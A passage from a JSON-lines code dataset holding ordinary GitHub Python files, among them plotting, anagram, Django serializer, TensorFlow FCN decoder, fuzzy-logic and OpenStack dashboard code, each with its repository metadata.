cluster_list\n","repo_name":"MalcomMerlyn/dizertatie","sub_path":"sources_py/aco_clustering.py","file_name":"aco_clustering.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22336302817","text":"import pandas as pd\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\ndef plot3D(file1,file2):\n\tdata_df = pd.read_csv(file1,delimiter = ' ',header=None)\n\tdata_df2 = pd.read_csv(file2, delimiter = ' ',header=None)\n\tx = data_df[1]\n\ty = data_df[2]\n\tz = data_df[3]\n\n\tx1 = data_df2[1]\n\ty1 = data_df2[2]\n\tz1 = data_df2[3]\n\n\txStart = x[:50]\n\tyStart = y[:50]\n\tzStart = z[:50]\n\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\tax.plot(x1, y1, z1, label='pose graph_ORB')\n\tax.plot(x, y, z, label='pose graph_GroundTruth_Start')\n\tax.plot(xStart, yStart, zStart, label='pose graph_GroundTruth')\n\tax.legend()\n\n\tplt.show()\n\nplot3D(sys.argv[1],sys.argv[2])\n","repo_name":"sohaib3k/SLAM-Internship","sub_path":"plot3D.py","file_name":"plot3D.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74674603939","text":"#!/usr/bin/python3\n\"\"\" SuperClass module.\n Define common attributes and methods for AirBnB console\n Classes:\n BaseModel: set common attributes & methods\n\"\"\"\n\nfrom uuid import uuid4\nfrom datetime import datetime\nimport models\n\n\nclass BaseModel():\n \"\"\" Define common attributes and methods for AirBnB console.\n Public instance attributes:\n id: unique id number, assigned with uuid.\n created_at: datetime assigned with the current date.\n updated_at: datetime assigned on creation or edition.\n __str__: custom str method prints readable class.\n Public instance methods:\n save(self): updates the public instance attribute update_at.\n to_dict(self): returns a dictionary with all key/values in\n __dict.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\" instance constructor\n \"\"\"\n\n if len(kwargs) > 0:\n for key in kwargs.keys():\n if key == '__class__':\n continue\n elif key == 'created_at' or key == 'updated_at':\n setattr(self, key,\n datetime.strptime(kwargs[key],\n '%Y-%m-%dT%H:%M:%S.%f'))\n else:\n setattr(self, key, kwargs[key])\n else:\n self.id = str(uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n models.storage.new(self)\n\n def __str__(self):\n \"\"\" Print a readable representation of class\n Format:\n [] () \n \"\"\"\n\n return \"[{}] ({}) {}\".format(self.__class__.__name__,\n self.id,\n self.__dict__)\n\n def save(self):\n \"\"\" updates the public instance attribute updated_at\n \"\"\"\n\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\" Return a dictionary type data from class\n \"\"\"\n\n proto_dict = dict(self.__dict__)\n proto_dict[\"__class__\"] = self.__class__.__name__\n proto_dict[\"created_at\"] = self.created_at.isoformat()\n proto_dict[\"updated_at\"] = self.updated_at.isoformat()\n\n return proto_dict\n","repo_name":"dev-loup/AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"12547653635","text":"\"\"\"\nFile: anagram.py\nName:\n----------------------------------\nThis program recursively finds all the anagram(s)\nfor the word input by user and terminates when the\ninput string matches the EXIT constant defined\nat line 19\n\nIf you correctly implement this program, you should see the\nnumber of anagrams for each word listed below:\n * arm -> 3 anagrams\n * contains -> 5 anagrams\n * stop -> 6 anagrams\n * tesla -> 10 anagrams\n * spear -> 12 anagrams\n\"\"\"\n\nimport time\n\n# Constants\nFILE = 'dictionary.txt' # This is the filename of an English dictionary\nEXIT = '-1' # Controls when to stop the loop\nALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\n# Global Variable\n# dict_list = []\ndictionary = [set()for i in range(26)]\n\n\ndef main():\n print('Welcome to stanCode \"Anagram Generator\" (or -1 to quit)')\n while True:\n start = time.time()\n read_dictionary()\n anagrams = input('Find anagrams for: ')\n if anagrams == EXIT:\n break\n else:\n s = []\n for item in s:\n s.append(item)\n find_anagrams(anagrams)\n end = time.time()\n print(end - start)\n\n\ndef read_dictionary():\n with open(FILE, 'r') as f:\n for line in f:\n # global dict_list\n dictionary[ALPHABET.find(line[0])].add(line.lower().strip())\n\n\ndef find_anagrams(s):\n \"\"\"\n :param s: list, the word import by user\n :return: str: the number of total anagrams and the word list\n \"\"\"\n word_lst = []\n helper(s, [], word_lst)\n print(str(len(word_lst)) + \" anagrams: \" + str(word_lst))\n\n\ndef helper(lst, word, word_lst):\n \"\"\"\n :param lst: list, the word import by user\n :param word: list, put the index of anagram\n :param word_lst: list, put the anagrams that is found in dictionary\n \"\"\"\n # Base case\n if len(lst) == len(word):\n word_str = \"\"\n for order in word:\n word_str += lst[int(order)]\n # if has_prefix(word_str):\n if len(word_str) == len(lst):\n if word_str in dictionary[ALPHABET.find(word_str[0])] and word_str not in word_lst:\n word_lst.append(word_str)\n print(\"Searching...\")\n print(\"Found: \" + word_str)\n else:\n for i in range(len(lst)):\n if i not in word:\n # Choose\n word.append(i)\n # Explore\n # if has_prefix(word):\n helper(lst, word, word_lst)\n # Un-choose\n word.pop()\n\n\n# def has_prefix(sub_s):\n# \"\"\"\n# :param sub_s: list\n# :return: bool, if the word is prefix, return True\n# \"\"\"\n# for item in dict_list:\n# if item.startswith(\"\".join(sub_s)):\n# return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JochenMa/stancode_projects","sub_path":"stancode_projects/anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37167475128","text":"import unittest\nfrom oars_gb_pkg.nodes.sensing.airmar import AirmarParser\nfrom geometry_msgs.msg import Pose2D\n\n\nclass TestAirmarMessageDecoding(unittest.TestCase):\n \"\"\"\n Tests the conversion of a list of GridMap cells to navigate into a list of GPS waypoints.\n \"\"\"\n\n def setUp(self):\n self.parser = AirmarParser(port=None, use_ros=False)\n # msg = '$GPGLL,4217.6274,N,07115.8634,W,202754.00,A,A*71'.split(',')\n\n def test_gps_message_decoding(self):\n msg = '$GPGLL,3500.0000,N,02500.0000,E,202754.00,A,A*71'.split(',')\n expected_output = Pose2D(x=25, y=35)\n self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n msg = '$GPGLL,3500.0000,S,02500.0000,W,202754.00,A,A*71'.split(',')\n expected_output = Pose2D(x=-25, y=-35)\n self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n msg = '$GPGLL,1510.2500,N,02515.5000,E,202754.00,A,A*71'.split(',')\n expected_output = Pose2D(x=self.to_deg(25, 15.5), y=self.to_deg(15, 10.25))\n self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n msg = '$GPGLL,0001.0200,S,00500.1000,E,202754.00,A,A*71'.split(',')\n expected_output = Pose2D(x=self.to_deg(5, 0.1), y=self.to_deg(0, -1.02))\n self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n msg = '$GPGLL,8024.1230,S,12501.2000,E,202754.00,A,A*71'.split(',')\n expected_output = Pose2D(x=self.to_deg(125, 1.2), y=self.to_deg(-80, 24.123))\n self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n @staticmethod\n def to_deg(degrees, minutes):\n return degrees + minutes / 60.0 if degrees >= 0 else degrees - minutes / 60.0\n\n\nif __name__ == '__main__':\n # Run the tests\n unittest.main()\n","repo_name":"olin-ars/trans-atlantic-sailboat","sub_path":"tests/test_airmar_message_decoding.py","file_name":"test_airmar_message_decoding.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"30992104091","text":"#This Python script creates 2 lists from a data file I have.\n#One list will contain all the files that start with the term ‘stats’ in it.\n#The second list will contain all files that have the term ‘thresholds.bbt.db’ in it. \n#!/Library/Frameworks/Python.framework/Versions/3.6/bin/python3\n#print the python version\nimport sys\nprint(sys.version)\n\n#to show if the file exist\nimport os\na=os.path.isfile(sys.argv[1])\nprint(a)\n\n#open file and search for targeted key words, put in 2 lists\nlist1=[]\nlist2=[]\nwith open(sys.argv[1], 'r') as f:\n data = f.readlines()\n for line in data:\n if line.__contains__('stats'):\n list1.append(line)\n if line.__contains__('thresholds.bbt.db'):\n list2.append(line)\n#sort the lists and write them in separate text files\nsorted(list1)\nwith open('list1.txt','w') as f:\n for line in sorted(list1):\n f.write(line)\n\nsorted(list2)\nwith open('list2.txt','w') as f:\n for line in sorted(list2):\n f.write(line)\n","repo_name":"nazaninsh/Bioinformatics","sub_path":"gsc.py","file_name":"gsc.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32765091188","text":"from rest_framework import serializers\nfrom django.contrib.auth.hashers import make_password\nfrom cryptography.fernet import Fernet\nfrom django.conf import settings\nfrom .models import (ShopCredentials, Shipments, ShipmentsItems,\n Transport, CustomerDetails, shopRequestLog,\n tokenRequestLog)\n\n\nclass ShopCredentialsSerializer(serializers.ModelSerializer):\n\n def _encrypt(self, clientSecret):\n return Fernet(settings.SHOP_KEY).encrypt(bytes(clientSecret, 'utf-8'))\n\n def create(self, validated_data):\n new_validated_data = {\n \"shopName\": validated_data['shopName'],\n \"clientId\": validated_data['clientId'],\n \"clientSecret\": self._encrypt(validated_data['clientSecret'])\n }\n return super().create(new_validated_data)\n\n class Meta:\n model = ShopCredentials\n fields = ('shopId', 'shopName', 'clientId',\n 'clientSecret', 'clientToken')\n\n\nclass ShipmentsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Shipments\n fields = ('shipmentId', 'shipmentDate', 'shipmentReference',\n 'transportId', 'shopId', 'orderItemId', 'orderId')\n\n\nclass ShipmentsItemsSerializer(serializers.ModelSerializer):\n class Meta:\n model = ShipmentsItems\n fields = ('pickUpPoint', 'orderItemId', 'orderId', 'orderDate',\n 'latestDeliveryDate', 'ean', 'title', 'quantity', 'offerPrice',\n 'offerCondition', 'offerReference', 'fulfilmentMethod',\n 'shipmentId')\n\n\nclass TransportSerializer(serializers.ModelSerializer):\n class Meta:\n model = Transport\n fields = ('transportId', 'transporterCode', 'trackAndTrace',\n 'shipmentId')\n\n\nclass CustomerDetailsSerializer(serializers.ModelSerializer):\n class Meta:\n model = CustomerDetails\n fields = ('salutationCode', 'zipCode', 'countryCode', 'shipmentId')\n\n\nclass tokenRequestLogSerializer(serializers.ModelSerializer):\n class Meta:\n model = tokenRequestLog\n fields = ('taskId', 'completed', 'shopId')\n\n\nclass shopRequestLogSerializer(serializers.ModelSerializer):\n class Meta:\n model = shopRequestLog\n fields = ('taskId', 'completed', 'shopId')\n","repo_name":"taiseii/API-sync","sub_path":"bol_client/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71585400742","text":"import gegede.builder\nfrom duneggd.LocalTools import localtools as ltools\nfrom gegede import Quantity as Q\n\nclass SandInnerVolumeBuilder(gegede.builder.Builder):\n def configure( self, halfDimension=None, Material=None, nBarrelModules=None, GRAINThickness=None, clearenceECALGRAIN=None, clearenceGRAINTracker=None, clearenceTrackerECAL=None,**kwds):\n self.halfDimension = halfDimension\n self.Material = Material\n self.kloeVesselRadius = self.halfDimension['rmax']\n self.kloeVesselHalfDx = self.halfDimension['dz']\n self.nBarrelModules = nBarrelModules\n self.rotAngle = 0.5 * Q('360deg') / self.nBarrelModules\n self.GRAINThickness = GRAINThickness\n\n self.clearenceECALGRAIN = clearenceECALGRAIN\n self.clearenceGRAINTracker = clearenceGRAINTracker\n self.clearenceTrackerECAL = clearenceTrackerECAL\n\n def construct(self,geom):\n sand_inner_volume_shape = geom.shapes.PolyhedraRegular(\"sand_inner_volume_shape\",numsides=self.nBarrelModules, rmin=Q('0cm'), rmax=self.kloeVesselRadius , dz=self.kloeVesselHalfDx, sphi=self.rotAngle)\n #sand_inner_volume_shape = geom.shapes.Tubs(\"sand_inner_volume_shape\", rmin = Q(\"0mm\"), rmax = self.kloeVesselRadius, dz=self.kloeVesselHalfDx/2)\n main_lv = geom.structure.Volume('sand_inner_volume', material=self.Material, shape=sand_inner_volume_shape)\n self.add_volume( main_lv )\n self.build_tracker(main_lv, geom)\n self.build_grain(main_lv, geom)\n\n def build_tracker(self, main_lv, geom):\n # if \"STT\" not in self.builders:\n # print(\"STT builder not found\")\n # return \n if \"STT\" in self.builders:\n print(\"STT builder found\")\n tracker_builder=self.get_builder(\"STT\")\n elif \"SAND_TRACKER\" in self.builders:\n tracker_builder=self.get_builder(\"SAND_TRACKER\")\n else:\n print(\"no SAND tracker found\")\n return\n \n \n tracker_lv=tracker_builder.get_volume()\n\n tracker_position = geom.structure.Position(\n 'tracker_position', Q('0m'), Q('0m'), Q('0m'))\n\n tracker_rotation = geom.structure.Rotation(\n 'tracker_rotation', Q('0deg'), Q('180deg'), Q('0deg'))\n\n tracker_placement = geom.structure.Placement('tracker_place',\n volume=tracker_lv,\n pos=tracker_position,\n rot=tracker_rotation)\n\n main_lv.placements.append(tracker_placement.name) \n\n def build_grain(self, main_lv, geom):\n if \"GRAIN\" not in self.builders:\n print(\"GRAIN builder not found\")\n return \n\n grain_builder=self.get_builder(\"GRAIN\")\n grain_lv=grain_builder.get_volume()\n \n grain_position = geom.structure.Position(\"grain_position\",\n self.kloeVesselRadius - 0.5*self.GRAINThickness - self.clearenceECALGRAIN,\n Q('0mm'),\n Q('0mm'))\n\n grain_rotation = geom.structure.Rotation(\n 'grain_rotation', Q('0deg'), Q('0deg'), Q('0deg'))\n\n grain_placement = geom.structure.Placement('grain_place',\n volume=grain_lv,\n pos=grain_position,\n rot=grain_rotation)\n main_lv.placements.append(grain_placement.name) \n ","repo_name":"DUNE/dunendggd","sub_path":"duneggd/SubDetector/SandInnerVolume.py","file_name":"SandInnerVolume.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10099769857","text":"# -*- coding: utf-8 -*-\n# @Time : 18-12-07\n# @Author : Yang Jiao\n# @Site : http://github.com/mrjiao2018\n# @File : fcn_decoder.py\n# @IDE : PyCharm Community Edition\n\nimport tensorflow as tf\nfrom encoder_decoder_model import cnn_base_model\nfrom encoder_decoder_model import vgg_encoder\nfrom encoder_decoder_model import dense_encoder\n\"\"\"\npacking FCN \n\"\"\"\n\nclass FCNDecoder(cnn_base_model.CNNBaseModel):\n \"\"\"\n packing FCN\n \"\"\"\n def __init__(self, phase):\n super(FCNDecoder, self).__init__()\n self._train_phase = tf.constant('train', dtype=tf.string)\n self._phase = phase\n self._is_training = self._init_phase()\n\n def _init_phase(self):\n \"\"\"\n :return:\n \"\"\"\n return tf.equal(self._phase, self._train_phase)\n\n def decode(self, input_tensor_dict, decode_layer_list, name):\n \"\"\"\n using deconv to decode the network and get pixel feature info\n\n :param input_tensor_dict:\n :param decode_layer_list: those layers which need to be decoded\n need to be written from deep to shallow\n eg. ['pool5', 'pool4', 'pool3']\n :param name:\n :return:\n \"\"\"\n ret = dict()\n\n with tf.variable_scope(name):\n # score stage 1\n input_tensor = input_tensor_dict[decode_layer_list[0]]['data']\n\n score = self.conv2d(input_data=input_tensor, out_channel=64,\n kernel_size=1, use_bias=False, name='score_origin')\n decode_layer_list = decode_layer_list[1:]\n for i in range(len(decode_layer_list)):\n deconv = self.deconv2d(input_data=score, out_channel=64, kernel_size=4,\n stride=2, use_bias=False, name='deconv_{:d}'.format(i + 1))\n input_tensor = input_tensor_dict[decode_layer_list[i]]['data']\n score = self.conv2d(input_data=input_tensor, out_channel=64,\n kernel_size=1, use_bias=False, name='score_{:d}'.format(i + 1))\n fused = tf.add(deconv, score, name='fuse_{:d}'.format(i + 1))\n score = fused\n\n deconv_final = self.deconv2d(input_data=score, out_channel=64, kernel_size=16,\n stride=8, use_bias=False, name='deconv_final')\n\n score_final = self.conv2d(input_data=deconv_final, out_channel=2,\n kernel_size=1, use_bias=False, name='score_final')\n\n ret['logits'] = score_final\n ret['deconv'] = deconv_final\n\n return ret\n\n\nif __name__ == '__main__':\n\n vgg_encoder = vgg_encoder.VGG16Encoder(phase=tf.constant('train', tf.string))\n dense_encoder = dense_encoder.DenseEncoder(L=40, growth_rate=12,\n with_bc=True, phase='train', N=5)\n decoder = FCNDecoder(phase='train')\n\n in_tensor = tf.placeholder(dtype=tf.float32, shape=[None, 256, 512, 3],\n name='input')\n\n vgg_encode_ret = vgg_encoder.encode(in_tensor, name='vgg_encoder')\n dense_encode_ret = dense_encoder.encode(in_tensor, name='dense_encoder')\n decode_ret = decoder.decode(vgg_encode_ret, name='decoder',\n decode_layer_list=['pool5',\n 'pool4',\n 'pool3'])\n print(decode_ret)","repo_name":"mrjiao2018/lane-detection","sub_path":"encoder_decoder_model/fcn_decoder.py","file_name":"fcn_decoder.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33862148509","text":"from fastapi_mail import ConnectionConfig, FastMail, MessageSchema\nfrom ..settings import settings\n\nmail_config = ConnectionConfig(\n MAIL_USERNAME=settings.mail_username,\n MAIL_PASSWORD=settings.mail_password,\n MAIL_FROM=settings.mail_from,\n MAIL_SERVER=\"smtp.gmail.com\",\n MAIL_PORT=settings.mail_port,\n MAIL_STARTTLS=True,\n MAIL_SSL_TLS=False,\n)\n\nfm = FastMail(mail_config)\n\n\nasync def send_email(to: str, subject: str, body: str):\n message = MessageSchema(\n subject=subject,\n recipients=[to],\n body=body,\n subtype=\"html\",\n )\n await fm.send_message(message)\n","repo_name":"tora-o/reservation-system-backend","sub_path":"reservation_system/utils/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24453572194","text":"import fuzzy_tools as fuzz\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import cos, sin\nimport random\n\n# no. of iterations\nn_steps = 200\n\n# no. of rules\nn_rules = 5\n\nlam1 = 0.001\nlam2 = 0.001\nlam3 = 0.001\n\n# universe\nx = np.linspace(0, 6, 1000)\n\n# function to estimate\ng = x - cos(1.5*x) + sin(0.4*x)\n\n# training data pairs\nx_train = np.random.rand(n_steps,)*6.0\n\n# to get output data point\ndef get_y(data_point_x):\n return data_point_x - cos(1.5*data_point_x) + sin(0.4*data_point_x)\n\n# to update the fuzzy sets with lates paramter value\ndef update_fuzzy_sets(memship, c, sig):\n for i in range(len(memship)):\n memship[i].params = [c[i, 0], sig[i, 0], \"none\"]\n\n return memship\n\ndef get_rule_premise(x, memship):\n rule_premise = np.zeros((n_rules, 1))\n for i in range(len(memship)):\n fuzz.fuzzify(x, memship[i])\n rule_premise[i, 0] = memship[i].fuzz_val\n return rule_premise\n\ndef fuzzy_grad_des(data_point_x, f, b, c, sig, premise):\n e = f - get_y(data_point_x)\n basis_func = premise/np.sum(premise)\n b_next = np.zeros_like(b)\n c_next = np.zeros_like(c)\n sig_next = np.zeros_like(sig)\n\n for i in range(n_rules):\n # update output singleton positions\n b_next[i,0] = b[i,0] - lam1*e*basis_func[i,0]\n\n # update input fuzzy set centres\n c_next[i,0] = c[i,0] - lam2*e*premise[i,0]*((data_point_x - c[i,0])/(sig[i,0]**2))*((b[i,0] - f)/np.sum(premise))\n\n # update input fuzzy set spreads\n sig_next[i,0] = sig[i,0] - lam3*e*((b[i,0] - f)/np.sum(premise))*premise[i,0]*(((data_point_x - c[i,0])**2)/(sig[i,0])**3)\n\n return [b_next, c_next, sig_next]\n\ndef simulate(memship, b_0, c_0, sig_0):\n for i in range(n_steps):\n data_point_x = x_train[i]\n\n # initial step\n if i == 0:\n # get estimate of function\n premise = get_rule_premise(data_point_x, memship)\n f = np.dot(np.transpose(b_0), premise)\n # get updated params\n b_next, c_next, sig_next = fuzzy_grad_des(data_point_x, f, b_0, c_0, sig_0, premise)\n memship = update_fuzzy_sets(memship, c_next, sig_next)\n\n else:\n # get estimate of function\n premise = get_rule_premise(data_point_x, memship)\n f = np.dot(np.transpose(b_next), premise)\n # get updated params\n b_next, c_next, sig_next = fuzzy_grad_des(data_point_x, f, b_next, c_next, sig_next, premise)\n memship = update_fuzzy_sets(memship, c_next, sig_next)\n\n return [b_next, c_next, sig_next]\n\ndef compare(b, c, sig, memship):\n fuzz_basis = np.zeros((len(x) ,n_rules))\n memship = update_fuzzy_sets(memship, c, sig)\n temp = np.zeros((n_rules,))\n for i in range(len(x)):\n for j in range(n_rules):\n fuzz.fuzzify(x[i], memship[j])\n temp[j] = memship[j].fuzz_val\n fuzz_basis[i] = temp/np.sum(temp)\n\n g_cap = np.zeros_like(x)\n for i in range(len(x)):\n g_cap[i] = b[0]*fuzz_basis[i,0] + b[1]*fuzz_basis[i,1] + b[2]*fuzz_basis[i,2] + b[3]*fuzz_basis[i,3] + b[4]*fuzz_basis[i,4]\n\n plt.plot(x, g, x, g_cap)\n plt.show()\n\ndef main():\n # create fuzzy system\n # initial fuzzy set parameters\n b_0 = np.random.rand(5, 1)*15.0\n c_0 = np.random.rand(5, 1)*6.0\n sig_0 = np.random.rand(5, 1)*2.0\n\n # create fuzzy sets\n memship = []\n for i in range(len(b_0)):\n p = [c_0[i, 0], sig_0[i, 0], \"none\"]\n memship.append(fuzz.membership(\"gauss\", p, x, \"none\"))\n\n b, c, sig = simulate(memship, b_0, c_0, sig_0)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n \n compare(b, c, sig, memship)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Thalaivar/python","sub_path":"control/fuzzy_control/fuzzy_gradient.py","file_name":"fuzzy_gradient.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"74330345380","text":"from collections import OrderedDict\nimport logging\n\nfrom django.core.urlresolvers import reverse\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms as horizon_forms\nfrom horizon import tables as horizon_tables\nfrom horizon import tabs as horizon_tabs\nfrom horizon.utils import memoized\n\nfrom openstack_dashboard.contrib.trove import api\nfrom openstack_dashboard.contrib.trove.content.database_clusters import forms\nfrom openstack_dashboard.contrib.trove.content.database_clusters import tables\nfrom openstack_dashboard.contrib.trove.content.database_clusters import tabs\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass IndexView(horizon_tables.DataTableView):\n table_class = tables.ClustersTable\n template_name = 'project/database_clusters/index.html'\n\n def has_more_data(self, table):\n return self._more\n\n @memoized.memoized_method\n def get_flavors(self):\n try:\n flavors = api.trove.flavor_list(self.request)\n except Exception:\n flavors = []\n msg = _('Unable to retrieve database size information.')\n exceptions.handle(self.request, msg)\n return OrderedDict((unicode(flavor.id), flavor) for flavor in flavors)\n\n def _extra_data(self, cluster):\n try:\n cluster_flavor = cluster.instances[0][\"flavor\"][\"id\"]\n flavors = self.get_flavors()\n flavor = flavors.get(cluster_flavor)\n if flavor is not None:\n cluster.full_flavor = flavor\n except Exception:\n # ignore any errors and just return cluster unaltered\n pass\n return cluster\n\n def get_data(self):\n marker = self.request.GET.get(\n tables.ClustersTable._meta.pagination_param)\n # Gather our clusters\n try:\n clusters = api.trove.cluster_list(self.request, marker=marker)\n self._more = clusters.next or False\n except Exception:\n self._more = False\n clusters = []\n msg = _('Unable to retrieve database clusters.')\n exceptions.handle(self.request, msg)\n\n map(self._extra_data, clusters)\n\n return clusters\n\n\nclass LaunchClusterView(horizon_forms.ModalFormView):\n form_class = forms.LaunchForm\n template_name = 'project/database_clusters/launch.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n\n\nclass DetailView(horizon_tabs.TabbedTableView):\n tab_group_class = tabs.ClusterDetailTabs\n template_name = 'project/database_clusters/detail.html'\n\n page_title = _(\"Cluster Details: {{ cluster.name }}\")\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n context[\"cluster\"] = self.get_data()\n return context\n\n @memoized.memoized_method\n def get_data(self):\n try:\n cluster_id = self.kwargs['cluster_id']\n cluster = api.trove.cluster_get(self.request, cluster_id)\n except Exception:\n redirect = reverse('horizon:project:database_clusters:index')\n msg = _('Unable to retrieve details '\n 'for database cluster: %s') % cluster_id\n exceptions.handle(self.request, msg, redirect=redirect)\n try:\n cluster.full_flavor = api.trove.flavor_get(\n self.request, cluster.instances[0][\"flavor\"][\"id\"])\n except Exception:\n LOG.error('Unable to retrieve flavor details'\n ' for database cluster: %s' % cluster_id)\n cluster.num_instances = len(cluster.instances)\n\n # Todo(saurabhs) Set mgmt_url to dispaly Mgmt Console URL on\n # cluster details page\n # for instance in cluster.instances:\n # if instance['type'] == \"master\":\n # cluster.mgmt_url = \"https://%s:5450/webui\" % instance['ip'][0]\n\n return cluster\n\n def get_tabs(self, request, *args, **kwargs):\n cluster = self.get_data()\n return self.tab_group_class(request, cluster=cluster, **kwargs)\n\n\nclass AddShardView(horizon_forms.ModalFormView):\n form_class = forms.AddShardForm\n template_name = 'project/database_clusters/add_shard.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n page_title = _(\"Add Shard\")\n\n def get_context_data(self, **kwargs):\n context = super(AddShardView, self).get_context_data(**kwargs)\n context[\"cluster_id\"] = self.kwargs['cluster_id']\n return context\n\n def get_object(self, *args, **kwargs):\n if not hasattr(self, \"_object\"):\n cluster_id = self.kwargs['cluster_id']\n try:\n self._object = api.trove.cluster_get(self.request, cluster_id)\n # TODO(michayu): assumption that cluster is homogeneous\n flavor_id = self._object.instances[0]['flavor']['id']\n flavors = self.get_flavors()\n if flavor_id in flavors:\n self._object.flavor_name = flavors[flavor_id].name\n else:\n flavor = api.trove.flavor_get(self.request, flavor_id)\n self._object.flavor_name = flavor.name\n except Exception:\n redirect = reverse(\"horizon:project:database_clusters:index\")\n msg = _('Unable to retrieve cluster details.')\n exceptions.handle(self.request, msg, redirect=redirect)\n return self._object\n\n def get_flavors(self, *args, **kwargs):\n if not hasattr(self, \"_flavors\"):\n try:\n flavors = api.trove.flavor_list(self.request)\n self._flavors = OrderedDict([(str(flavor.id), flavor)\n for flavor in flavors])\n except Exception:\n redirect = reverse(\"horizon:project:database_clusters:index\")\n exceptions.handle(\n self.request,\n _('Unable to retrieve flavors.'), redirect=redirect)\n return self._flavors\n\n def get_initial(self):\n initial = super(AddShardView, self).get_initial()\n _object = self.get_object()\n if _object:\n initial.update(\n {'cluster_id': self.kwargs['cluster_id'],\n 'name': getattr(_object, 'name', None)})\n return initial\n\n\nclass ResetPasswordView(horizon_forms.ModalFormView):\n form_class = forms.ResetPasswordForm\n template_name = 'project/database_clusters/reset_password.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n page_title = _(\"Reset Root Password\")\n\n @memoized.memoized_method\n def get_object(self, *args, **kwargs):\n cluster_id = self.kwargs['cluster_id']\n try:\n return api.trove.cluster_get(self.request, cluster_id)\n except Exception:\n msg = _('Unable to retrieve cluster details.')\n redirect = reverse('horizon:project:database_clusters:index')\n exceptions.handle(self.request, msg, redirect=redirect)\n\n def get_context_data(self, **kwargs):\n context = super(ResetPasswordView, self).get_context_data(**kwargs)\n context['cluster_id'] = self.kwargs['cluster_id']\n return context\n\n def get_initial(self):\n return {'cluster_id': self.kwargs['cluster_id']}\n","repo_name":"daolicloud/daolinet-openstack","sub_path":"openstack/openstack-dashboard/openstack_dashboard/contrib/trove/content/database_clusters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"40737847693","text":"import sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom math import floor\n\n\nclass VertexFlowLayout(QtWidgets.QLayout):\n def __init__(self, parent=None, margin=0, spacing=-1):\n super(VertexFlowLayout, self).__init__(parent)\n\n if parent is not None:\n self.setContentsMargins(margin, margin, margin, margin)\n\n self.setSpacing(spacing)\n self.margin = margin\n self.enableAddWidget = False\n self.addLastWidget = None\n \n # spaces between each item\n self.spaceX = 5\n self.spaceY = 5\n\n self.itemList = []\n\n def __del__(self):\n item = self.takeAt(0)\n while item:\n item = self.takeAt(0)\n\n def addItem(self, item):\n if(self.addLastWidget != None and self.addLastWidget != item.wid):\n self.itemList.insert(len(self.itemList) -1, item)\n else:\n self.itemList.append(item)\n \n self.update()\n\n def count(self):\n return len(self.itemList)\n\n def itemAt(self, index):\n if index >= 0 and index < len(self.itemList):\n return self.itemList[index]\n\n return None\n\n def takeAt(self, index):\n if index >= 0 and index < len(self.itemList):\n print(\"remove\", index)\n return self.itemList.pop(index)\n\n return None\n\n def expandingDirections(self):\n return 